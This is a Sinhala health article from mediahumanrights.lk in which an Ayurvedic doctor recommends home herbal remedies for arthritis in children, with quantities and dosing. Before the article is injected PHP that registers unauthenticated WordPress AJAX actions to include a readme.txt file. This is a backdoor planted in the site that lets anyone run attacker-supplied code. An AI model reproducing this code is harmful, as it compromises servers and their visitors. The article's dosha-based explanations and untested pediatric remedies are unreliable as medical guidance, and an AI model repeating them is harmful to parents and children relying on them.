if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ආත්‍රයිටිස්‌ රෝගයට බිං කොහොඹ කසායක්‌ - mediahumanrights.lk
mediahumanrights.lk
LIFE LIFE NEWS News

ආත්‍රයිටිස්‌ රෝගයට බිං කොහොඹ කසායක්‌

ප්‍රශ්නය – කුඩා දරුවන්ට හැදෙන ආත්‍රයිටිස්‌ රෝගය සඳහා සුදුසු ශාකසාරමය ආයුර්වේද ප්‍රතිකාර ගැන අප පසුගිය සතියේදී සාකච්ඡා කළා. අද ඒ ගැන තවදුරටත් කතා කරන්නට බලාපොරොත්තු වෙනවා.
වෛද්‍ය වසන්ත උදයජීව – කුඩා දරුවන්ට හැදෙන ආත්‍රයිටිස්‌ රෝගයට ප්‍රතිකාර කරන විට ආයුර්වේද වෛද්‍යවරුන් මුලින්ම කරන්නේ රෝගයට බලපාන ශාරීරික තත්ත්වයන්ට ප්‍රතිකාර කර ඒවායින් ශරීරය නිදහස්‌ කර ගැනීමයි. ආයුර්වේදයට අනුව අපේ ශරීරයේ සෞඛ්‍ය සම්පත්තිය, සුවතාව, ලෙඩ රෝගවලට භාජන වීමේ හැකියාව යන කාරණා පාලනය වන්නේ ප්‍රධාන දොaෂ තත්ත්ව හතරක්‌ මගිනුයි. එයින් වාත දොaෂය පැනනැංගාම ආත්‍රයිටිස්‌ හටගන්නවා. මේ තත්ත්වය තුළදී සිරුර තුළ ආමය නමැති විෂ සහිත දෙයක්‌ හටගන්නවා. මේ නිසා ආහාර ජීරණ ක්‍රියාවලිය සම්පූර්ණයෙන්ම හෝ අර්ධ වශයෙන් බිඳවැටෙනවා. ආමය ජනිත වුණාම මුළු මහත් ශරීරය පුරාම ගමන් කරනවා.
ඊළඟට ශරීරයේ දුර්වල තැන්වල තැන්පත් වෙනවා. මේ අතර ශරීරය තුළ තිබෙන වාත දොaෂ තත්ත්වය ක්‍රියාත්මක වෙනවා. එතකොට ආමය ක්‍රියාත්මක වී වැඩිදියුණු වෙන්නට පටන් ගන්නවා. සන්ධි වේදනාව හටගන්නේ මෙසේ ආමය වැඩිදියුණු වීමට පටන් ගත් විටයි. සාමාන්‍යයෙන් ඇඟිලි සන්ධිවල හටගන්නා ආත්‍රයිටිස්‌ තත්ත්වයට වඩා පාදයේ සන්ධිවල හටගන්නා ආත්‍රයිටිස්‌ තත්ත්වය දරුණුයි. හේතුව එම සන්ධිවලට ශරීරයේ බර සම්පූර්ණ වශයෙන්ම වැටීමයි. මේ නිසා ආත්‍රයිටිස්‌ රෝගයට ප්‍රතිකාර කරන විට ශරීරයේ වාත තත්ත්වය සමබර කිරීමට ආයුර්වේද වෛද්‍යවරයා උත්සුක වෙනවා.
ප්‍රශ්නය – ආත්‍රයිටිස්‌ රෝගයට ප්‍රතිකාර කිරීමේදී මෙයින් ඔබ්බේ යමක්‌ සිදුවන්නේ නැද්ද?
වෛද්‍ය උදයජීව – ස්‌ථිර වශයෙන්ම සිදුවෙනවා. මුලින්ම ශරීරයේ රුධිර වහනය සිදුවන සියලු නහර පිරිසිදු කෙරෙනවා. ඊළඟට ආහාර ජීරණය ශක්‌තිමත් තත්ත්වයකට පත් කරනවා. තුන්වෙනුව සන්ධිවල ලිහිසි තත්ත්වය වර්ධනය කර සන්ධි එහා මෙහා කිරීමේ පහසුව ඇති කරනවා. ස්‌නායු පද්ධතියේ ක්‍රියාකාරිත්වය සමතුලිත කරනවා.
ප්‍රශ්නය – ආත්‍රයිටිස්‌ රෝගය සමනය කර ගැනීම සඳහා දැන් අප අත් බෙහෙත් කිහිපයක්‌ බලාපොරොත්තු වෙනවා.
වෛද්‍ය වසන්ත උදයජීව – ඖෂධ කිහිපයක්‌ම තිබෙනවා. අබ තෙල් කෝප්ප 1 ක්‌ අරගෙන එයට කපුරු (කපුරු බෝල නොවේ) ග්‍රෑම් 10 ක්‌ මිශ්‍ර කර කපුරු සම්පූර්ණයෙන්ම දියවන තුරු තෙල් රත් කරන්න. තෙල් ඇල් මැරුණු පසු ආත්‍රයිටිස්‌ නිසා ඉදිමුණ සන්ධි සියල්ල එම තෙල් වලින් ඉතා හොඳින් සම්බාහනය කරන්න. මෙවිට සන්ධිවල දැඩි බව සහ ඉදිමුම නැතිව යනවා.
ඊළඟ ඖෂධය මුං ඇට සහ සුදුලූනු ඇසුරින් නිපදවන එකක්‌. මුං ඇට මේස හැඳි 3 ක්‌ වතුර මිලිලීටර් 250 ක දමා රැයක්‌ එළිවනතුරු පොඟවා ගන්න. පසු දින මුං ඇටවල අංකුර ඇදුණු පසු සුදුලූනු බික්‌ දෙකක්‌ අඹරා මුංඇට සමග මිශ්‍ර කරන්න. එයට ලුණු සහ ගම්මිරිස්‌ එකතු කර උදේටත් සවසටත් ආහාරයට ගන්න. මුංඇට පිසීමෙන් වළකින්න. සතියක්‌ පමණ මෙම ප්‍රතිකාරය කර ප්‍රතිඵල භුක්‌ති විඳින්න.
මේ වාගේම උසස්‌ ප්‍රතිඵල ගෙන දෙන තවත් බෙහෙතක්‌ කියන්නම්. මේ සඳහා ඉඟුරු කුඩු ග්‍රෑම් 50 ක්‌, උළුහාල් කුඩු ග්‍රෑම් 50 ක්‌ සහ කහ කුඩු ග්‍රෑම් 50 ක්‌ අවශ්‍යයි. මේ සියල්ල හොඳින් මිශ්‍ර කර අසුරනයකට දමා සුළං නොයන සේ හොඳින් වසා තබාගෙන සෑම උදයකම සහ සවසකම තේ හැන්දක්‌ බැගින් අනුභව කරන්න. කුඩු ගතිය නිසා කෑම අපහසු නම් උණුවතුර ස්‌වල්පයක්‌ මිශ්‍ර කර ආහාරයට ගන්න.
උදේට සහ හවසට තල අහුරක්‌ බැගින් දිගටම අනුභව කළ හැකිනම්, ආත්‍රයිටිස්‌ රෝගයට එයත් හොඳ ප්‍රතිකාරයක්‌.
ආත්‍රයිටිස්‌ රෝගයට බිං කොහොඹ
බිං කොහොඹ, කොහොඹ පොතු, එලබටු, කටුවැල්බටු, කොටිල පොතු, ලුණවරණ පොතු, අමු ඉඟුරු, දියමිත්ත යනාදිය කලං 1 මංචාඩි 10 බැගින් ගෙන වතුර පත 8 කට දමා පත 1 ට සිඳවා පෙරා උදේ සවස පත භාගය බැගින් බොන්න. පානය කළයුතු කාලය දින 6 කි.

Related posts

ජාත්‍යන්තර පරිසර දිනය අදයි

Shiran Viraj

ඉන්දියාවේ පරාජය ක්‍රිකට් වාර්තා අලූත් කරයි

Shiran Viraj

දීර්ඝ පාසල් නිවාඩුව හෙටින් ඇරඹේ..

Shiran Viraj